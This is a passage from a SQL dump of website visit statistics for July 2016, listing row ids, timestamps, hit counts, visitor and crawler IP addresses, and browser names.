,1,1,0,0,'141.8.142.61','other'),(47382,1467714458,1,1,0,0,'130.193.50.34','other'),(47383,1467714729,1,1,0,0,'52.3.127.144','other'),(47384,1467715348,1,1,0,0,'37.53.227.243','chrome'),(47385,1467715367,2,2,0,0,'130.193.50.34','other'),(47386,1467715589,1,1,0,0,'130.193.51.19','other'),(47387,1467715734,2,2,0,0,'141.8.183.25','other'),(47388,1467716110,1,1,0,0,'91.196.178.71','msie'),(47389,1467716797,1,1,0,0,'40.77.167.15','other'),(47390,1467717099,1,1,0,0,'94.179.232.110','chrome'),(47391,1467717704,1,1,0,0,'193.19.152.14','chrome'),(47392,1467717960,1,1,0,0,'91.196.178.67','chrome'),(47393,1467718824,1,1,0,0,'37.54.16.247','firefox'),(47394,1467719070,1,1,0,0,'91.196.178.67','firefox'),(47395,1467719765,1,1,0,0,'5.45.192.65','chrome'),(47396,1467719786,2,2,0,0,'94.178.13.159','chrome'),(47397,1467719790,1,1,0,0,'91.196.178.35','chrome'),(47398,1467720434,1,1,0,0,'164.132.161.90','other'),(47399,1467721254,1,1,0,0,'91.201.246.109','chrome'),(47400,1467723641,1,1,0,0,'5.45.255.65','chrome'),(47401,1467723918,1,1,0,0,'91.196.178.71','chrome'),(47402,1467723930,1,1,0,0,'178.92.3.138','chrome'),(47403,1467724507,1,0,1,0,'66.249.78.136',''),(47404,1467724895,1,1,0,0,'94.179.110.47','chrome'),(47405,1467726182,1,1,0,0,'178.95.156.201','chrome'),(47406,1467726418,1,0,1,0,'66.249.78.164',''),(47407,1467726549,1,1,0,0,'91.196.178.67','firefox'),(47408,1467726786,1,1,0,0,'151.80.31.161','other'),(47409,1467727213,1,1,0,0,'94.153.208.164','chrome'),(47410,1467728038,1,1,0,0,'52.3.127.144','other'),(47411,1467728651,1,0,1,0,'66.249.78.143',''),(47412,1467729153,1,1,0,0,'130.193.50.34','other'),(47413,1467729155,1,1,0,0,'141.8.183.25','other'),(47414,1467729253,1,1,0,0,'207.46.13.101','other'),(47415,1467730706,1,0,1,0,'66.249.78.178',''),(47416,1467730780,1,1,0,0,'207.46.13.101','other'),(47417,1467731120,1,0,1,0,'66.249.78.150',''),(47418,1467731169,2,2,0,0,'130.193.50.34','other'),(47419,1467731296,1,1,0,0,'180.76.15.6','other'),(47420,1467732011,1,0,1,0,'66.249.78.143',''),(47421,1467732336,1,1,0,0,'141.8.183.25','other'),(47422,1467732823,1,1,0,0,'91.196.178.68','firefox'),(47423,1467733607,1,1,0,0,'141.8.183.25','other'),(47424,1467734805,1,0,1,0,'66.249.78.171',''),(47425,1467735314,1,1,0,0,'180.76.15.141','other'),(47426,1467735596,3,3,0,0,'130.193.50.34','other'),(47427,1467735881,1,1,0,0,'141.8.142.58','other'),(47428,1467736007,1,1,0,0,'141.8.183.19','other'),(47429,1467736133,1,1,0,0,'141.8.142.61','other'),(47430,1467736720,2,2,0,0,'5.9.89.170','other'),(47431,1467738806,1,1,0,0,'130.193.51.19','other'),(47432,1467740142,1,1,0,0,'91.196.178.39','chrome'),(47433,1467740627,1,0,1,0,'66.249.78.136',''),(47434,1467740726,2,0,2,0,'66.249.78.171',''),(47435,1467741201,2,2,0,0,'66.249.93.90','chrome'),(47436,1467743007,1,0,1,0,'66.249.78.171',''),(47437,1467743215,1,0,1,0,'66.249.78.164',''),(47438,1467743940,1,1,0,0,'91.124.239.2','firefox'),(47439,1467744756,1,0,1,0,'66.249.78.178',''),(47440,1467744822,1,1,0,0,'91.196.178.132','chrome'),(47441,1467746041,1,1,0,0,'207.46.13.44','other'),(47442,1467746152,1,1,0,0,'91.196.178.69','chrome'),(47443,1467746381,2,0,2,0,'66.249.78.171',''),(47444,1467746879,1,1,0,0,'141.0.14.139','other'),(47445,1467747888,1,0,1,0,'66.249.78.143',''),(47446,1467747920,1,0,1,0,'66.249.78.178',''),(47447,1467748248,1,1,0,0,'130.193.50.34','other'),(47448,1467748253,1,1,0,0,'141.8.142.67','other'),(47449,1467748677,1,0,1,0,'66.249.78.171',''),(47450,1467749340,1,1,0,0,'207.46.13.44','other'),(47451,1467750655,4,4,0,0,'173.208.157.186','other'),(47452,1467751080,2,1,1,0,'66.249.78.143',''),(47453,1467751495,1,1,0,0,'66.249.78.178','chrome'),(47454,1467751508,1,1,0,0,'178.92.8.253','chrome'),(47455,1467752684,1,1,0,0,'141.8.142.61','other'),(47456,1467753262,2,2,0,0,'130.193.51.19','other'),(47457,1467753301,1,1,0,0,'95.221.203.202','msie'),(47458,1467753819,1,1,0,0,'164.132.161.25','other'),(47459,1467754758,1,1,0,0,'164.132.161.91','other'),(47460,1467754826,1,1,0,0,'130.193.51.19','other'),(47461,1467755019,2,2,0,0,'141.8.183.25','other'),(47462,1467755064,1,0,1,0,'66.249.78.171',''),(47463,1467755206,1,0,1,0,'66.249.78.164',''),(47464,1467755270,1,1,0,0,'130.193.50.34','other'),(47465,1467755496,2,0,2,0,'66.249.78.178',''),(47466,1467755925,1,1,0,0,'69.30.213.82','other'),(47467,1467757023,1,1,0,0,'130.193.51.19','other'),(47468,1467757027,2,2,0,0,'130.193.50.34','other'),(47469,1467757616,1,1,0,0,'141.8.183.25','other'),(47470,1467758520,1,1,0,0,'51.255.65.60','other'),(47471,1467759216,1,1,0,0,'180.76.15.7','other'),(47472,1467759568,1,0,1,0,'66.249.78.164',''),(47473,1467759870,4,4,0,0,'149.202.48.207','other'),(47474,1467760633,1,0,1,0,'66.249.78.164',''),(47475,1467760671,7,7,0,0,'5.9.85.4','other'),(47476,1467761657,1,1,0,0,'141.8.183.25','other'),(47477,1467761658,1,1,0,0,'130.193.50.34','other'),(47478,1467763736,1,1,0,0,'130.193.50.34','other'),(47479,1467764739,1,0,1,0,'66.249.78.164',''),(47480,1467766225,1,0,1,0,'66.249.78.171',''),(47481,1467766484,2,2,0,0,'130.193.50.34','other'),(47482,1467766886,1,1,0,0,'164.132.161.12','other'),(47483,1467767148,1,0,1,0,'66.249.78.171',''),(47484,1467767470,2,2,0,0,'130.193.50.34','other'),(47485,1467767587,1,1,0,0,'51.255.65.6','other'),(47486,1467767757,1,0,1,0,'66.249.78.136',''),(47487,1467769071,1,1,0,0,'141.8.142.61','other'),(47488,1467769163,1,1,0,0,'130.193.51.79','other'),(47489,1467769164,1,1,0,0,'93.158.152.40','other'),(47490,1467769772,1,1,0,0,'151.80.31.101','other'),(47491,1467769802,1,0,1,0,'66.249.75.207',''),(47492,1467770732,1,1,0,0,'141.8.183.25','other'),(47493,1467771036,2,2,0,0,'141.8.142.67','other'),(47494,1467771174,1,0,1,0,'66.249.78.171',''),(47495,1467771671,1,1,0,0,'51.255.65.17','other'),(47496,1467771773,1,1,0,0,'95.133.31.227','chrome'),(47497,1467771935,1,0,1,0,'66.249.78.143',''),(47498,1467771992,3,3,0,0,'130.193.50.34','other'),(47499,1467772116,2,2,0,0,'141.8.183.25','other'),(47500,1467772185,1,1,0,0,'130.193.51.19','other'),(47501,1467772259,3,3,0,0,'141.8.142.58','other'),(47502,1467773464,1,0,1,0,'66.249.75.191',''),(47503,1467773788,1,0,1,0,'68.180.229.171',''),(47504,1467773959,3,3,0,0,'130.193.51.19','other'),(47505,1467774025,3,3,0,0,'130.193.50.34','other'),(47506,1467774656,1,1,0,0,'141.8.142.67','other'),(47507,1467775035,1,1,0,0,'51.255.65.81','other'),(47508,1467776361,1,0,1,0,'66.249.78.136',''),(47509,1467777442,1,0,1,0,'66.249.78.178',''),(47510,1467778268,2,2,0,0,'141.8.142.58','other'),(47511,1467778659,1,1,0,0,'95.135.241.133','other'),(47512,1467779198,1,1,0,0,'180.76.15.33','other'),(47513,1467780031,2,2,0,0,'207.46.13.44','other'),(47514,1467780581,1,0,1,0,'66.249.75.239',''),(47515,1467780888,1,1,0,0,'130.193.51.19','other'),(47516,1467781113,1,1,0,0,'51.255.65.97','other'),(47517,1467781205,1,1,0,0,'207.46.13.44','other'),(47518,1467781478,1,1,0,0,'141.8.183.25','other'),(47519,1467781670,1,1,0,0,'91.196.178.67','firefox'),(47520,1467782023,1,1,0,0,'141.8.142.61','other'),(47521,1467782942,1,1,0,0,'141.8.142.67','other'),(47522,1467783017,1,1,0,0,'37.53.247.170','firefox'),(47523,1467783054,1,1,0,0,'130.193.51.19','other'),(47524,1467783189,2,2,0,0,'141.8.183.25','other'),(47525,1467783338,1,1,0,0,'130.193.50.34','other'),(47526,1467783480,1,1,0,0,'141.8.142.58','other'),(47527,1467783687,1,1,0,0,'94.179.27.39','firefox'),(47528,1467784268,1,1,0,0,'91.196.178.65','firefox'),(47529,1467784454,1,1,0,0,'130.193.51.19','other'),(47530,1467784455,1,1,0,0,'141.8.183.25','other'),(47531,1467784843,1,1,0,0,'207.46.13.71','other'),(47532,1467785611,1,1,0,0,'130.193.51.19','other'),(47533,1467785613,1,1,0,0,'93.158.152.84','other'),(47534,1467786120,1,1,0,0,'130.193.50.34','other'),(47535,1467786512,1,1,0,0,'91.196.178.132','firefox'),(47536,1467787106,1,0,1,0,'66.249.78.164',''),(47537,1467787249,1,1,0,0,'51.255.65.71','other'),(47538,1467787351,1,1,0,0,'91.196.178.67','firefox'),(47539,1467788574,1,1,0,0,'37.73.235.70','chrome'),(47540,1467788715,1,1,0,0,'31.128.100.166','chrome'),(47541,1467788750,1,1,0,0,'130.193.50.34','other'),(47542,1467788833,1,1,0,0,'91.196.178.65','chrome'),(47543,1467788898,1,1,0,0,'130.193.51.19','other'),(47544,1467789606,1,1,0,0,'66.249.93.121','chrome'),(47545,1467789929,1,1,0,0,'94.178.192.26','opera'),(47546,1467790045,1,1,0,0,'91.196.178.168','chrome'),(47547,1467790064,1,1,0,0,'91.244.15.34','chrome'),(47548,1467790303,1,1,0,0,'91.196.178.67','firefox'),(47549,1467790360,1,1,0,0,'91.196.178.67','chrome'),(47550,1467790375,1,1,0,0,'46.172.64.121','chrome'),(47552,1467790440,1,1,0,0,'94.179.56.205','chrome'),(47553,1467791505,1,1,0,0,'109.251.94.35','chrome'),(47554,1467792048,1,1,0,0,'94.178.192.26','opera'),(47555,1467792591,1,1,0,0,'141.8.183.25','other'),(47556,1467792751,1,1,0,0,'91.196.178.67','firefox'),(47557,1467792995,1,1,0,0,'130.193.50.34','other'),(47558,1467793184,1,0,1,0,'66.249.78.143',''),(47559,1467793281,1,1,0,0,'91.196.178.161','firefox'),(47560,1467794636,1,1,0,0,'91.196.178.67','firefox'),(47561,1467795491,3,3,0,0,'130.193.50.34','other'),(47562,1467795493,1,1,0,0,'130.193.51.19','other'),(47563,1467795907,1,1,0,0,'141.8.142.58','other'),(47564,1467796100,1,1,0,0,'141.8.183.25','other'),(47565,1467796249,1,0,1,0,'66.249.78.143',''),(47566,1467797386,1,1,0,0,'91.196.178.169','opera'),(47567,1467797499,1,1,0,0,'94.179.56.205','chrome'),(47568,1467797690,1,1,0,0,'37.52.61.11','firefox'),(47569,1467798026,1,0,1,0,'68.180.229.171',''),(47570,1467798664,1,1,0,0,'92.60.177.193','chrome'),(47571,1467799085,1,1,0,0,'95.135.241.22','firefox'),(47572,1467799860,1,1,0,0,'180.76.15.31','other'),(47573,1467801011,2,2,0,0,'141.8.142.67','other'),(47574,1467801013,7,7,0,0,'130.193.50.34','other'),(47575,1467801318,1,0,1,0,'66.249.78.136',''),(47576,1467801393,2,2,0,0,'130.193.51.19','other'),(47577,1467801464,1,1,0,0,'5.255.253.67','other'),(47578,1467801470,2,2,0,0,'141.8.142.58','other'),(47579,1467801525,1,1,0,0,'141.8.142.61','other'),(47580,1467801543,1,1,0,0,'93.158.152.84','other'),(47581,1467801624,3,3,0,0,'141.8.183.25','other'),(47582,1467801690,1,0,1,0,'66.249.78.171',''),(47583,1467801825,1,1,0,0,'94.179.67.100','chrome'),(47584,1467802016,2,2,0,0,'130.193.50.34','other'),(47585,1467802447,1,1,0,0,'141.8.132.10','other'),(47586,1467802597,1,1,0,0,'141.8.142.58','other'),(47587,1467802726,2,2,0,0,'141.8.142.61','other'),(47588,1467802876,1,1,0,0,'66.249.78.171','chrome'),(47589,1467803000,1,1,0,0,'141.8.183.25','other'),(47590,1467803125,1,1,0,0,'130.193.51.19','other'),(47591,1467803159,1,1,0,0,'91.196.179.33','chrome'),(47592,1467803343,1,1,0,0,'207.46.13.71','other'),(47593,1467803387,1,1,0,0,'51.255.65.14','other'),(47594,1467803988,1,1,0,0,'151.80.31.175','other'),(47595,1467806414,1,1,0,0,'178.92.211.135','chrome'),(47596,1467806423,1,1,0,0,'91.196.178.67','firefox'),(47597,1467806961,1,1,0,0,'91.222.155.172','chrome'),(47598,1467807321,1,1,0,0,'194.146.191.194','chrome'),(47599,1467808433,1,1,0,0,'95.134.49.129','chrome'),(47600,1467808515,1,0,1,0,'66.249.78.178',''),(47601,1467809104,3,3,0,0,'141.8.142.58','other'),(47602,1467809230,1,1,0,0,'141.8.142.61','other'),(47603,1467809276,1,1,0,0,'130.193.51.19','other'),(47604,1467809488,2,2,0,0,'141.8.183.25','other'),(47605,1467809978,1,1,0,0,'207.46.13.71','other'),(47606,1467810198,1,1,0,0,'178.92.220.9','chrome'),(47607,1467811157,2,2,0,0,'141.8.142.58','other'),(47608,1467811293,1,1,0,0,'151.80.31.158','other'),(47609,1467811360,1,1,0,0,'141.8.183.25','other'),(47610,1467811476,1,1,0,0,'93.158.152.40','other'),(47611,1467811479,1,1,0,0,'141.8.132.41','other'),(47612,1467811530,1,1,0,0,'130.193.50.34','other'),(47613,1467811831,1,0,1,0,'66.249.78.171',''),(47614,1467811934,1,1,0,0,'130.180.209.185','chrome'),(47615,1467812924,1,1,0,0,'95.134.202.178','chrome'),(47616,1467813049,1,1,0,0,'180.76.15.19','other'),(47617,1467813752,1,1,0,0,'95.132.117.42','chrome'),(47618,1467813871,1,0,1,0,'66.249.78.150',''),(47619,1467815181,1,1,0,0,'130.193.50.34','other'),(47620,1467815182,1,1,0,0,'141.8.142.58','other'),(47621,1467815950,1,0,1,0,'66.249.78.178',''),(47622,1467816526,1,1,0,0,'94.179.30.34','chrome'),(47623,1467816641,1,0,1,0,'66.249.78.143',''),(47624,1467817069,1,1,0,0,'180.76.15.8','other'),(47625,1467817102,1,1,0,0,'51.255.65.38','other'),(47626,1467817685,1,1,0,0,'91.196.178.37','chrome'),(47627,1467817740,1,1,0,0,'130.193.51.19','other'),(47628,1467818120,2,2,0,0,'130.193.50.34','other'),(47629,1467818989,1,0,1,0,'66.249.78.150',''),(47630,1467819308,1,1,0,0,'91.196.178.71','firefox'),(47631,1467819478,1,1,0,0,'178.92.250.226','firefox'),(47632,1467819601,2,0,2,0,'68.180.229.171',''),(47633,1467820550,1,1,0,0,'207.46.13.83','other'),(47634,1467820851,1,1,0,0,'178.92.250.226','firefox'),(47635,1467821736,5,5,0,0,'141.8.183.25','other'),(47636,1467821860,1,1,0,0,'141.8.142.61','other'),(47637,1467822018,1,1,0,0,'130.193.50.34','other'),(47638,1467822110,1,1,0,0,'130.193.51.19','other'),(47639,1467822149,1,1,0,0,'141.8.142.58','other'),(47640,1467823012,1,1,0,0,'91.196.178.37','chrome'),(47641,1467823046,1,1,0,0,'141.8.183.25','other'),(47642,1467823600,1,1,0,0,'141.8.142.61','other'),(47643,1467823724,1,1,0,0,'130.193.50.34','other'),(47644,1467824360,1,1,0,0,'164.132.161.76','other'),(47645,1467824962,1,0,1,0,'66.249.78.171',''),(47646,1467825642,4,4,0,0,'141.8.183.25','other'),(47647,1467825768,1,1,0,0,'130.193.50.34','other'),(47648,1467826340,1,1,0,0,'130.193.51.19','other'),(47649,1467826556,1,1,0,0,'94.179.119.97','firefox'),(47650,1467826797,1,0,1,0,'66.249.78.171',''),(47651,1467827616,1,1,0,0,'37.54.135.225','chrome'),(47652,1467827712,1,1,0,0,'180.76.15.142','other'),(47653,1467828662,1,1,0,0,'130.193.51.79','other'),(47654,1467828663,1,1,0,0,'130.193.37.7','other'),(47655,1467828739,1,0,1,0,'66.249.78.150',''),(47656,1467828819,1,1,0,0,'91.196.178.36','chrome'),(47657,1467828844,1,0,1,0,'66.249.78.171',''),(47658,1467829454,1,1,0,0,'193.194.127.217','firefox'),(47659,1467829954,1,1,0,0,'91.124.238.171','firefox'),(47660,1467830619,1,1,0,0,'130.193.50.34','other'),(47661,1467830620,1,1,0,0,'141.8.142.58','other'),(47662,1467830885,1,1,0,0,'193.194.127.203','firefox'),(47663,1467830939,1,1,0,0,'94.100.184.100','msie'),(47664,1467831807,1,1,0,0,'95.46.6.6','chrome'),(47665,1467831884,1,1,0,0,'91.124.238.171','firefox'),(47666,1467831889,1,1,0,0,'51.255.65.76','other'),(47667,1467832555,1,1,0,0,'164.132.161.47','other'),(47668,1467832557,1,1,0,0,'51.254.215.143','other'),(47669,1467832716,1,1,0,0,'51.255.65.14','other'),(47670,1467833098,1,1,0,0,'130.193.50.34','other'),(47671,1467833678,1,1,0,0,'82.145.222.136','chrome'),(47672,1467835495,1,1,0,0,'130.180.208.74','chrome'),(47673,1467835961,1,0,1,0,'66.249.78.171',''),(47674,1467836480,1,0,1,0,'66.249.78.136',''),(47675,1467837709,1,0,1,0,'66.249.78.136',''),(47676,1467837717,1,1,0,0,'66.249.78.136','chrome'),(47677,1467838385,1,1,0,0,'66.102.9.103','chrome'),(47678,1467838898,2,2,0,0,'141.8.183.25','other'),(47679,1467839715,1,1,0,0,'66.249.78.143','chrome'),(47680,1467840007,1,1,0,0,'66.249.78.171','chrome'),(47681,1467841004,1,1,0,0,'141.8.183.19','other'),(47682,1467841265,1,0,1,0,'66.249.78.164',''),(47683,1467841819,1,1,0,0,'141.8.142.61','other'),(47684,1467842591,1,1,0,0,'178.154.189.37','other'),(47685,1467842592,1,1,0,0,'141.8.132.30','other'),(47686,1467842595,1,1,0,0,'5.255.253.68','other'),(47687,1467842716,1,1,0,0,'5.255.253.67','other'),(47688,1467843627,1,1,0,0,'141.8.183.25','other'),(47689,1467843684,4,4,0,0,'144.76.93.46','other'),(47690,1467844058,1,0,1,0,'66.249.78.171',''),(47691,1467844524,1,1,0,0,'180.76.15.15','other'),(47692,1467846284,1,0,1,0,'66.249.78.171',''),(47693,1467846552,2,0,2,0,'66.249.78.178',''),(47694,1467846586,3,0,3,0,'66.249.78.164',''),(47695,1467847115,1,1,0,0,'207.46.13.83','other'),(47696,1467848519,1,1,0,0,'141.8.183.25','other'),(47697,1467849709,1,1,0,0,'52.3.127.144','other'),(47698,1467850313,1,1,0,0,'130.193.50.34','other'),(47699,1467850315,1,1,0,0,'130.193.50.6','other'),(47700,1467852377,1,1,0,0,'141.8.142.58','other'),(47701,1467852378,1,1,0,0,'141.8.142.67','other'),(47702,1467853000,1,0,1,0,'66.249.78.171',''),(47703,1467853078,1,0,1,0,'66.249.75.191',''),(47704,1467855635,1,0,1,0,'66.249.78.136',''),(47705,1467857060,1,1,0,0,'51.255.65.41','other'),(47706,1467857888,1,1,0,0,'141.8.142.58','other'),(47707,1467858069,1,0,1,0,'66.249.78.143',''),(47708,1467858323,1,1,0,0,'141.0.14.44','other'),(47709,1467858718,1,1,0,0,'37.204.54.243','chrome'),(47710,1467858719,1,1,0,0,'95.221.212.59','chrome'),(47711,1467858782,1,1,0,0,'66.249.78.171','chrome'),(47712,1467859790,1,1,0,0,'207.46.13.83','other'),(47713,1467860881,1,1,0,0,'91.196.178.71','firefox'),(47714,1467861751,2,2,0,0,'130.193.50.34','other'),(47715,1467862032,1,0,1,0,'66.249.78.178',''),(47716,1467862507,1,1,0,0,'130.193.51.19','other'),(47717,1467863150,1,1,0,0,'141.8.183.25','other'),(47718,1467863155,1,1,0,0,'141.8.142.61','other'),(47719,1467863833,1,1,0,0,'130.193.50.34','other'),(47720,1467864512,1,1,0,0,'180.76.15.135','other'),(47721,1467865164,1,0,1,0,'66.249.78.150',''),(47722,1467865479,1,1,0,0,'141.8.142.67','other'),(47723,1467865480,1,1,0,0,'5.255.253.67','other'),(47724,1467865948,1,0,1,0,'66.249.78.164',''),(47725,1467866409,1,0,1,0,'66.249.78.171',''),(47726,1467866556,1,1,0,0,'141.8.142.58','other'),(47727,1467868170,1,1,0,0,'91.196.178.68','firefox'),(47728,1467869810,1,1,0,0,'180.76.15.155','other'),(47729,1467869817,1,1,0,0,'178.154.189.31','other'),(47730,1467869818,1,1,0,0,'5.255.253.47','other'),(47731,1467870030,1,1,0,0,'46.211.112.174','chrome'),(47732,1467870131,1,1,0,0,'130.193.51.74','other'),(47733,1467870541,1,1,0,0,'5.255.253.67','other'),(47734,1467870770,1,1,0,0,'66.249.93.117','chrome'),(47735,1467871268,1,1,0,0,'193.194.127.224','firefox'),(47736,1467871439,1,0,1,0,'66.249.78.171',''),(47737,1467871490,1,1,0,0,'95.221.250.187','msie'),(47738,1467871495,1,1,0,0,'188.32.239.17','msie'),(47739,1467871501,2,2,0,0,'46.201.239.218','firefox'),(47740,1467871571,1,1,0,0,'141.8.142.25','other'),(47741,1467871922,1,1,0,0,'46.211.112.174','chrome'),(47742,1467872546,1,0,1,0,'66.249.75.207',''),(47743,1467872586,2,0,2,0,'66.249.78.164',''),(47744,1467872600,1,0,1,0,'66.249.78.171',''),(47745,1467872845,1,1,0,0,'66.249.93.125','chrome'),(47746,1467873121,1,0,1,0,'66.249.78.136',''),(47747,1467873219,1,0,1,0,'66.249.78.178',''),(47748,1467874612,1,1,0,0,'91.222.155.172','chrome'),(47749,1467874713,1,1,0,0,'37.54.164.68','firefox'),(47750,1467874719,1,1,0,0,'91.196.178.68','firefox'),(47751,1467874810,1,0,1,0,'66.249.78.171',''),(47752,1467875399,1,1,0,0,'46.211.24.14','chrome'),(47753,1467875917,1,1,0,0,'178.154.149.10','other'),(47754,1467876226,1,1,0,0,'91.196.178.70','firefox'),(47755,1467876568,1,1,0,0,'141.8.183.25','other'),(47756,1467876572,1,1,0,0,'141.8.142.25','other'),(47757,1467876980,1,1,0,0,'141.8.132.41','other'),(47758,1467877033,1,0,1,0,'66.249.69.170',''),(47759,1467877246,1,0,1,0,'66.249.78.143',''),(47760,1467877270,1,1,0,0,'130.193.50.4','other'),(47761,1467877978,1,1,0,0,'91.196.178.68','firefox'),(47762,1467877982,1,1,0,0,'141.8.142.61','other'),(47763,1467877983,2,2,0,0,'93.158.152.40','other'),(47764,1467878273,1,0,1,0,'66.249.78.143',''),(47765,1467878330,1,1,0,0,'130.193.50.34','other'),(47766,1467878920,1,1,0,0,'92.113.55.171','chrome'),(47767,1467879058,2,0,2,0,'66.249.78.178',''),(47768,1467879421,1,1,0,0,'207.241.226.230','other'),(47769,1467879527,1,1,0,0,'130.180.220.56','chrome'),(47770,1467879562,1,1,0,0,'91.124.49.83','chrome'),(47771,1467879605,1,1,0,0,'46.211.24.18','chrome'),(47772,1467879646,1,1,0,0,'69.30.198.186','other'),(47773,1467879884,1,1,0,0,'94.153.192.46','firefox'),(47774,1467880007,1,0,1,0,'66.249.69.175',''),(47775,1467880255,2,2,0,0,'46.201.239.218','firefox'),(47776,1467880295,1,1,0,0,'91.124.2.23','chrome'),(47777,1467880780,1,1,0,0,'141.8.183.25','other'),(47778,1467881232,1,1,0,0,'82.207.91.234','firefox'),(47779,1467881465,1,1,0,0,'130.193.50.34','other'),(47780,1467882037,1,1,0,0,'94.153.192.46','firefox'),(47781,1467882612,1,0,1,0,'66.249.78.171',''),(47782,1467883042,1,1,0,0,'130.193.50.34','other'),(47783,1467883730,1,1,0,0,'212.26.135.195','chrome'),(47784,1467884260,1,1,0,0,'91.196.178.68','firefox'),(47785,1467884333,1,1,0,0,'31.128.100.166','chrome'),(47786,1467884640,1,1,0,0,'130.193.50.34','other'),(47787,1467884692,1,1,0,0,'157.55.39.9','other'),(47788,1467885052,1,1,0,0,'95.220.127.67','chrome'),(47789,1467885054,1,1,0,0,'176.77.62.19','chrome'),(47790,1467885251,1,1,0,0,'91.196.178.69','chrome'),(47791,1467887277,1,1,0,0,'141.8.142.25','other'),(47792,1467887281,1,1,0,0,'130.193.37.7','other'),(47793,1467887596,2,2,0,0,'130.193.50.34','other'),(47794,1467888166,2,2,0,0,'130.193.51.19','other'),(47795,1467888620,1,1,0,0,'46.201.239.218','firefox'),(47796,1467889175,1,1,0,0,'95.158.10.101','firefox'),(47797,1467889267,1,1,0,0,'94.179.37.134','chrome'),(47798,1467889284,1,1,0,0,'40.77.167.7','other'),(47799,1467889543,1,1,0,0,'66.102.9.113','chrome'),(47800,1467890858,2,2,0,0,'130.193.51.19','other'),(47801,1467891108,1,1,0,0,'91.196.178.68','firefox'),(47802,1467891482,1,1,0,0,'130.193.50.34','other'),(47803,1467892411,1,1,0,0,'91.196.178.65','chrome'),(47804,1467892457,1,1,0,0,'93.158.152.84','other'),(47805,1467892696,1,1,0,0,'91.244.15.34','chrome'),(47806,1467892887,1,1,0,0,'141.8.142.58','other'),(47807,1467893970,1,1,0,0,'93.158.152.84','other'),(47808,1467893977,1,1,0,0,'141.8.142.58','other'),(47809,1467895061,1,1,0,0,'141.8.142.61','other'),(47810,1467896602,1,1,0,0,'141.0.14.165','other'),(47811,1467896731,1,1,0,0,'91.196.178.68','firefox'),(47812,1467896891,1,1,0,0,'195.211.147.156','chrome'),(47813,1467897082,1,1,0,0,'95.135.183.34','chrome'),(47814,1467897681,1,1,0,0,'91.196.178.133','firefox'),(47815,1467897971,1,1,0,0,'157.55.39.9','other'),(47816,1467897974,1,0,1,0,'66.249.78.150',''),(47817,1467898100,1,1,0,0,'95.133.2.138','opera'),(47818,1467898134,1,1,0,0,'141.8.183.25','other'),(47819,1467898263,4,4,0,0,'192.166.218.214','other'),(47820,1467898611,1,0,1,0,'66.249.78.136',''),(47821,1467898712,1,1,0,0,'91.196.178.72','opera'),(47822,1467899301,2,2,0,0,'91.196.178.70','firefox'),(47823,1467899325,1,1,0,0,'141.8.142.58','other'),(47824,1467900027,1,1,0,0,'164.132.161.95','other'),(47825,1467900496,1,1,0,0,'46.201.240.112','firefox'),(47826,1467900713,1,0,1,0,'66.249.75.191',''),(47827,1467901287,1,1,0,0,'93.158.152.84','other'),(47828,1467901387,4,4,0,0,'130.193.50.34','other'),(47829,1467901461,1,1,0,0,'91.196.178.72','firefox'),(47830,1467901858,1,1,0,0,'141.8.142.58','other'),(47831,1467902231,1,1,0,0,'141.8.183.25','other'),(47832,1467902415,1,1,0,0,'164.132.161.27','other'),(47833,1467902562,1,1,0,0,'151.80.31.168','other'),(47834,1467903440,1,1,0,0,'151.80.31.175','other'),(47835,1467904094,1,1,0,0,'180.76.15.137','other'),(47836,1467904504,1,1,0,0,'188.93.56.216','firefox'),(47837,1467904823,1,1,0,0,'141.8.142.58','other'),(47838,1467905195,1,1,0,0,'141.8.183.25','other'),(47839,1467906275,1,1,0,0,'130.193.50.34','other'),(47840,1467906308,2,2,0,0,'141.8.183.25','other'),(47841,1467906854,1,1,0,0,'130.193.51.19','other'),(47842,1467907683,1,1,0,0,'91.196.178.168','other'),(47843,1467908504,1,1,0,0,'37.54.39.23','chrome'),(47844,1467908617,1,1,0,0,'207.46.13.71','other'),(47845,1467909283,1,1,0,0,'207.46.13.180','other'),(47846,1467909346,2,0,2,0,'66.249.78.164',''),(47847,1467909444,1,0,1,0,'66.249.78.178',''),(47848,1467909542,1,1,0,0,'130.193.51.19','other'),(47849,1467909746,1,1,0,0,'130.193.50.34','other'),(47850,1467910372,1,0,1,0,'66.249.75.191',''),(47851,1467910605,3,3,0,0,'130.193.51.19','other'),(47852,1467910688,1,1,0,0,'141.8.142.61','other'),(47853,1467910734,1,1,0,0,'141.8.142.67','other'),(47854,1467910817,1,1,0,0,'130.193.50.34','other'),(47855,1467911120,1,1,0,0,'52.3.127.144','other'),(47856,1467911635,1,1,0,0,'180.76.15.145','other'),(47857,1467911636,1,1,0,0,'180.76.15.159','other'),(47858,1467912009,1,1,0,0,'178.92.8.57','chrome'),(47859,1467912016,1,1,0,0,'130.193.51.19','other'),(47860,1467912097,1,0,1,0,'68.180.229.171',''),(47861,1467912141,1,1,0,0,'141.8.142.58','other'),(47862,1467912149,1,1,0,0,'46.147.118.209','chrome'),(47863,1467912150,1,1,0,0,'37.110.98.20','chrome'),(47864,1467912339,1,1,0,0,'141.8.142.67','other'),(47865,1467912489,1,1,0,0,'130.193.50.34','other'),(47866,1467912491,1,1,0,0,'193.194.127.203','firefox'),(47867,1467912602,1,1,0,0,'95.221.250.187','msie'),(47868,1467912604,1,1,0,0,'176.77.24.163','msie'),(47869,1467912664,2,2,0,0,'141.8.183.25','other'),(47870,1467912667,1,1,0,0,'141.8.142.61','other'),(47871,1467913003,2,0,2,0,'66.249.78.164',''),(47872,1467913755,1,0,1,0,'66.249.78.136',''),(47873,1467913813,3,0,3,0,'66.249.78.171',''),(47874,1467914124,1,0,1,0,'66.249.78.164',''),(47875,1467914192,1,1,0,0,'91.196.178.71','firefox'),(47876,1467914511,1,0,1,0,'66.249.78.150',''),(47877,1467914652,1,0,1,0,'66.249.78.178',''),(47878,1467915406,1,0,1,0,'66.249.78.143',''),(47879,1467915896,1,1,0,0,'180.76.15.161','other'),(47880,1467916421,2,2,0,0,'130.193.50.34','other'),(47881,1467916423,3,3,0,0,'141.8.183.25','other'),(47882,1467916955,3,3,0,0,'130.193.51.19','other'),(47883,1467917403,1,1,0,0,'151.80.31.157','other'),(47884,1467918182,1,1,0,0,'66.249.78.150','chrome'),(47885,1467918411,1,1,0,0,'66.249.75.207','chrome'),(47886,1467919385,1,1,0,0,'130.193.51.19','other'),(47887,1467919386,1,1,0,0,'141.8.183.25','other'),(47888,1467919584,2,2,0,0,'198.245.49.215','other'),(47889,1467920202,1,1,0,0,'130.193.50.34','other'),(47890,1467920545,1,0,1,0,'66.249.78.150',''),(47891,1467921152,1,1,0,0,'180.76.15.160','other'),(47892,1467921886,1,1,0,0,'94.231.176.249','c